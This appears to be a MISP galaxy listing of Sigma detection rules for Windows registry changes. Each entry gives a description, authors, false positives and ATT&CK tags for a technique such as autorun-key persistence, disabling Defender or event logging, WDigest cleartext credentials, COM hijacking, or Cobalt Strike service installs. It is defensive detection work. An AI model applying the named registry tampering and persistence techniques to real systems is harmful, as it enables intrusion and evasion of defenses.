UUID cbf93e5d-ca6c-4722-8bea-e9119007c248 which can be used as unique global reference for CurrentVersion NT Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion_nt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

RDP Sensitive Settings Changed to Zero

Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.

Internal MISP references

UUID a2863fbc-d5cb-48d5-83fb-d976d4b1743b which can be used as unique global reference for RDP Sensitive Settings Changed to Zero in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022/09/29
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_suspicious.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1112']

Scripted Diagnostics Turn Off Check Enabled - Registry

Detects enabling of TurnOffCheck, which can be used to bypass the defenses against the MSDT Follina vulnerability

Internal MISP references

UUID 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 which can be used as unique global reference for Scripted Diagnostics Turn Off Check Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022/06/15
falsepositive ['Administrator actions']
filename registry_set_enabling_turnoffcheck.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Potential Signing Bypass Via Windows Developer Features - Registry

Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages.

Internal MISP references

UUID b110ebaf-697f-4da1-afd5-b536fa27a2c1 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/12
falsepositive ['Unknown']
filename registry_set_turn_on_dev_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Session Manager Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 046218bd-e0d8-4113-a3c3-895a12b2b298 which can be used as unique global reference for Session Manager Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_session_manager.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001', 'attack.t1546.009']

Add Debugger Entry To Hangs Key For Persistence

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence; the configured debugger gets invoked when an application crashes

Internal MISP references

UUID 833ef470-fa01-4631-a79b-6f291c9ac498 which can be used as unique global reference for Add Debugger Entry To Hangs Key For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['This value is not set by default but could be rarely used by administrators']
filename registry_set_hangs_debugger_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

Internal MISP references

UUID fad91067-08c5-4d1a-8d8c-d96a21b37814 which can be used as unique global reference for Potential PowerShell Execution Policy Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename registry_set_powershell_execution_policy.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

COM Hijack via Sdclt

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

Internal MISP references

UUID 07743f65-7ec9-404a-a519-913db7118a8d which can be used as unique global reference for COM Hijack via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omkar Gudhate
creation_date 2020/09/27
falsepositive ['Unknown']
filename registry_set_comhijack_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546', 'attack.t1548']

Winlogon Notify Key Logon Persistence

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.

Internal MISP references

UUID bbf59793-6efb-4fa1-95ca-a7d288e52c88 which can be used as unique global reference for Winlogon Notify Key Logon Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename registry_set_winlogon_notify_key.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.004']

Blackbyte Ransomware Registry

BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

Internal MISP references

UUID 83314318-052a-4c90-a1ad-660ece38d276 which can be used as unique global reference for Blackbyte Ransomware Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/24
falsepositive ['Unknown']
filename registry_set_blackbyte_ransomware.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Potential CobaltStrike Service Installations - Registry

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.

Internal MISP references

UUID 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 which can be used as unique global reference for Potential CobaltStrike Service Installations - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021/06/29
falsepositive ['Unlikely']
filename registry_set_cobaltstrike_service_installs.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']

Running Chrome VPN Extensions via the Registry 2 VPN Extension

Detects the installation of two Chrome VPN extensions via the registry

Internal MISP references

UUID b64a026b-8deb-4c1d-92fd-98893209dff1 which can be used as unique global reference for Running Chrome VPN Extensions via the Registry 2 VPN Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename registry_set_chrome_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1133']

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

Internal MISP references

UUID 9d15044a-7cfe-4d23-8085-6ebc11df7685 which can be used as unique global reference for Potential Persistence Via Visual Studio Tools for Office in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/01/10
falsepositive ['Legitimate Addin Installation']
filename registry_set_persistence_office_vsto.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1137.006', 'attack.persistence']

Wow6432Node CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID b29aed60-ebd1-442b-9cb5-16a1d0324adb which can be used as unique global reference for Wow6432Node CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Suspicious Keyboard Layout Load

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

Internal MISP references

UUID 34aa0252-6039-40ff-951f-939fd6ce47d8 which can be used as unique global reference for Suspicious Keyboard Layout Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/12
falsepositive ["Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)"]
filename registry_set_susp_keyboard_layout_load.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Disable Tamper Protection on Windows Defender

Detects disabling Windows Defender Tamper Protection

Internal MISP references

UUID 93d298a1-d28f-47f1-a468-d971e7796679 which can be used as unique global reference for Disable Tamper Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_tamper_protection_on_microsoft_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Wdigest Enable UseLogonCredential

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

Internal MISP references

UUID d6a9b252-c666-4de6-8806-5561bbbd3bdc which can be used as unique global reference for Wdigest Enable UseLogonCredential in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/09/12
falsepositive ['Unknown']
filename registry_set_wdigest_enable_uselogoncredential.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Change the Fax Dll

Detects possible persistence via loading of the Fax DLL when the Fax service restarts

Internal MISP references

UUID 9e3357ba-09d4-4fbd-a7c5-ad6386314513 which can be used as unique global reference for Change the Fax Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/17
falsepositive ['Unknown']
filename registry_set_fax_dll_persistance.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

ETW Logging Disabled For SCM

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

Internal MISP references

UUID 4f281b83-0200-4b34-bf35-d24687ea57c2 which can be used as unique global reference for ETW Logging Disabled For SCM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/09
falsepositive ['Unknown']
filename registry_set_services_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']

Disable PUA Protection on Windows Defender

Detects disabling Windows Defender PUA protection

Internal MISP references

UUID 8ffc5407-52e3-478f-9596-0a7371eafe13 which can be used as unique global reference for Disable PUA Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_pua_protection_on_microsoft_defender.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Persistence Via New SIP Provider

Detects when an attacker registers a new SIP provider for persistence and defense evasion

Internal MISP references

UUID 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 which can be used as unique global reference for Persistence Via New SIP Provider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate SIP being registered by the OS or different software.']
filename registry_set_sip_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1553.003']

Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 9df5f547-c86a-433e-b533-f2794357e242 which can be used as unique global reference for Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Potentially Suspicious ODBC Driver Registered

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

Internal MISP references

UUID e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 which can be used as unique global reference for Potentially Suspicious ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Unlikely']
filename registry_set_odbc_driver_registered_susp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1003']

Disable Microsoft Defender Firewall via Registry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Internal MISP references

UUID 974515da-6cc5-4c95-ae65-f97f9150ec7f which can be used as unique global reference for Disable Microsoft Defender Firewall via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename registry_set_disable_defender_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the configured debugger is invoked whenever an application crashes

Internal MISP references

UUID 9827ae57-3802-418f-994b-d5ecf5cd974b which can be used as unique global reference for Potential Registry Persistence Attempt Via DbgManagedDebugger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/07
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_dbgmanageddebugger_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1574']

Uncommon Microsoft Office Trusted Location Added

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.

Internal MISP references

UUID f742bde7-9528-42e5-bd82-84f51a8387d2 which can be used as unique global reference for Uncommon Microsoft Office Trusted Location Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Other unknown legitimate or custom paths need to be filtered to avoid false positives']
filename registry_set_office_trusted_location_uncommon.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Disable Privacy Settings Experience in Registry

Detects registry modifications that disable Privacy Settings Experience

Internal MISP references

UUID 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b which can be used as unique global reference for Disable Privacy Settings Experience in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/02
falsepositive ['Legitimate admin script']
filename registry_set_disable_privacy_settings_experience.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Usage of Renamed Sysinternals Tools - RegistrySet

Detects non-Sysinternals tools setting the "accepteula" key, which is normally set on Sysinternals tool execution

Internal MISP references

UUID 8023f872-3f1d-4301-a384-801889917ab4 which can be used as unique global reference for Usage of Renamed Sysinternals Tools - RegistrySet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unlikely']
filename registry_set_renamed_sysinternals_eula_accepted.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

COM Hijacking via TreatAs

Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command

Internal MISP references

UUID dc5c24af-6995-49b2-86eb-a9ff62199e82 which can be used as unique global reference for COM Hijacking via TreatAs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate use']
filename registry_set_treatas_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']

PowerShell Script Execution Policy Enabled

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

Internal MISP references

UUID 8218c875-90b9-42e2-b60d-0b0069816d10 which can be used as unique global reference for PowerShell Script Execution Policy Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/10/18
falsepositive ['Likely']
filename registry_set_powershell_enablescripts_enabled.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.execution']

New File Association Using Exefile

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Internal MISP references

UUID 44a22d59-b175-4f13-8c16-cbaef5b581ff which can be used as unique global reference for New File Association Using Exefile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/11/19
falsepositive ['Unknown']
filename registry_set_file_association_exefile.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Disable Windows Event Logging Via Registry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

Internal MISP references

UUID 2f78da12-f7c7-430b-8b19-a28f269b77a3 which can be used as unique global reference for Disable Windows Event Logging Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/04
falsepositive ['Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting']
filename registry_set_disable_winevt_logging.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']

New BgInfo.EXE Custom VBScript Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

Internal MISP references

UUID 992dd79f-dde8-4bb0-9085-6350ba97cfb3 which can be used as unique global reference for New BgInfo.EXE Custom VBScript Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate VBScript']
filename registry_set_bginfo_custom_vbscript.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Registry Persistence via Service in Safe Mode

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

Internal MISP references

UUID 1547e27c-3974-43e2-a7d7-7f484fb928ec which can be used as unique global reference for Registry Persistence via Service in Safe Mode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_add_load_service_in_safe_mode.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']

Scheduled TaskCache Change by Uncommon Program

Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process other than svchost.exe, which is suspicious

Internal MISP references

UUID 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d which can be used as unique global reference for Scheduled TaskCache Change by Uncommon Program in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Syed Hasan (@syedhasan009)
creation_date 2021/06/18
falsepositive ['Unknown']
filename registry_set_taskcache_entry.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1053', 'attack.t1053.005']

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

Internal MISP references

UUID a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd which can be used as unique global reference for Macro Enabled In A Potentially Suspicious Document in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Unlikely']
filename registry_set_office_trust_record_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Suspicious Powershell In Registry Run Keys

Detects potential PowerShell commands or code within registry run keys

Internal MISP references

UUID 8d85cf08-bf97-4260-ba49-986a2a65129c which can be used as unique global reference for Suspicious Powershell In Registry Run Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/03/17
falsepositive ['Legitimate admin or third party scripts. Baseline according to your environment']
filename registry_set_powershell_in_run_keys.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Registry Persistence via Explorer Run Key

Detects a possible persistence mechanism using the Windows Explorer RUN key pointing to a suspicious folder

Internal MISP references

UUID b7916c2a-fa2f-4795-9477-32b731f70f11 which can be used as unique global reference for Registry Persistence via Explorer Run Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2018/07/18
falsepositive ['Unknown']
filename registry_set_susp_reg_persist_explorer_run.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Potential Persistence Via GlobalFlags

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

Internal MISP references

UUID 36803969-5421-41ec-b92f-8500f79c23b0 which can be used as unique global reference for Potential Persistence Via GlobalFlags in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Karneades, Jonhnathan Ribeiro, Florian Roth
creation_date 2018/04/11
falsepositive ['Unknown']
filename registry_set_persistence_globalflags.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.defense_evasion', 'attack.t1546.012', 'car.2013-01-002']

Persistence Via Disk Cleanup Handler - Autorun

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4e2745c-f0c6-4bde-a3ab-b553b3f693cc which can be used as unique global reference for Persistence Via Disk Cleanup Handler - Autorun in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_disk_cleanup_handler_autorun_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Excel Add-in - Registry

Detects potential persistence via the creation of an Excel add-in (XLL) file that runs automatically when Excel is started.

Internal MISP references

UUID 961e33d1-4f86-4fcf-80ab-930a708b2f82 which can be used as unique global reference for Potential Persistence Via Excel Add-in - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/15
falsepositive ['Unknown']
filename registry_set_persistence_xll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']

Potential Persistence Via MyComputer Registry Keys

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

Internal MISP references

UUID 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 which can be used as unique global reference for Potential Persistence Via MyComputer Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/09
falsepositive ['Unlikely but if you experience FPs add specific processes and locations you would like to monitor for']
filename registry_set_persistence_mycomputer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New RUN Key Pointing to Suspicious Folder

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

Internal MISP references

UUID 02ee49e2-e294-4d0f-9278-f5b3212fc588 which can be used as unique global reference for New RUN Key Pointing to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
creation_date 2018/08/25
falsepositive ['Software using weird folders for updates']
filename registry_set_susp_run_key_img_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Custom File Open Handler Executes PowerShell

Detects the abuse of a custom file open handler to execute PowerShell

Internal MISP references

UUID 7530b96f-ad8e-431d-a04d-ac85cc461fdc which can be used as unique global reference for Custom File Open Handler Executes PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_R0M_
creation_date 2022/06/11
falsepositive ['Unknown']
filename registry_set_custom_file_open_handler_powershell_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Potential SentinelOne Shell Context Menu Scan Command Tampering

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

Internal MISP references

UUID 6c304b02-06e6-402d-8be4-d5833cdf8198 which can be used as unique global reference for Potential SentinelOne Shell Context Menu Scan Command Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/06
falsepositive ['Unknown']
filename registry_set_sentinelone_shell_context_tampering.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Service Binary in Suspicious Folder

Detects the creation of a service whose service binary is located in a suspicious directory

Internal MISP references

UUID a07f0359-4c90-4dc4-a681-8ffea40b4f47 which can be used as unique global reference for Service Binary in Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename registry_set_creation_service_susp_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

NET NGenAssemblyUsageLog Registry Key Tamper

Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simply specifying an arbitrary value (e.g. a fake output location or junk data) in place of the expected value, no Usage Log file is created for the .NET execution context.

Internal MISP references

UUID 28036918-04d3-423d-91c0-55ecf99fb892 which can be used as unique global reference for NET NGenAssemblyUsageLog Registry Key Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/18
falsepositive ['Unknown']
filename registry_set_net_cli_ngenassemblyusagelog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Common Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID f59c3faf-50f3-464b-9f4c-1b67ab512d99 which can be used as unique global reference for Common Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_common.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

ETW Logging Disabled For rpcrt4.dll

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

Internal MISP references

UUID 90f342e1-1aaa-4e43-b092-39fda57ed11e which can be used as unique global reference for ETW Logging Disabled For rpcrt4.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/09
falsepositive ['Unknown']
filename registry_set_rpcrt4_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']

Potential Persistence Via Scrobj.dll COM Hijacking

Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute

Internal MISP references

UUID fe20dda1-6f37-4379-bbe0-a98d400cae90 which can be used as unique global reference for Potential Persistence Via Scrobj.dll COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use of the dll.']
filename registry_set_persistence_scrobj_dll.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']

Allow RDP Remote Assistance Feature

Detects enabling of the RDP Remote Assistance feature to allow a specific user to connect via RDP to the targeted machine

Internal MISP references

UUID 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b which can be used as unique global reference for Allow RDP Remote Assistance Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use of the feature (alerts should be investigated either way)']
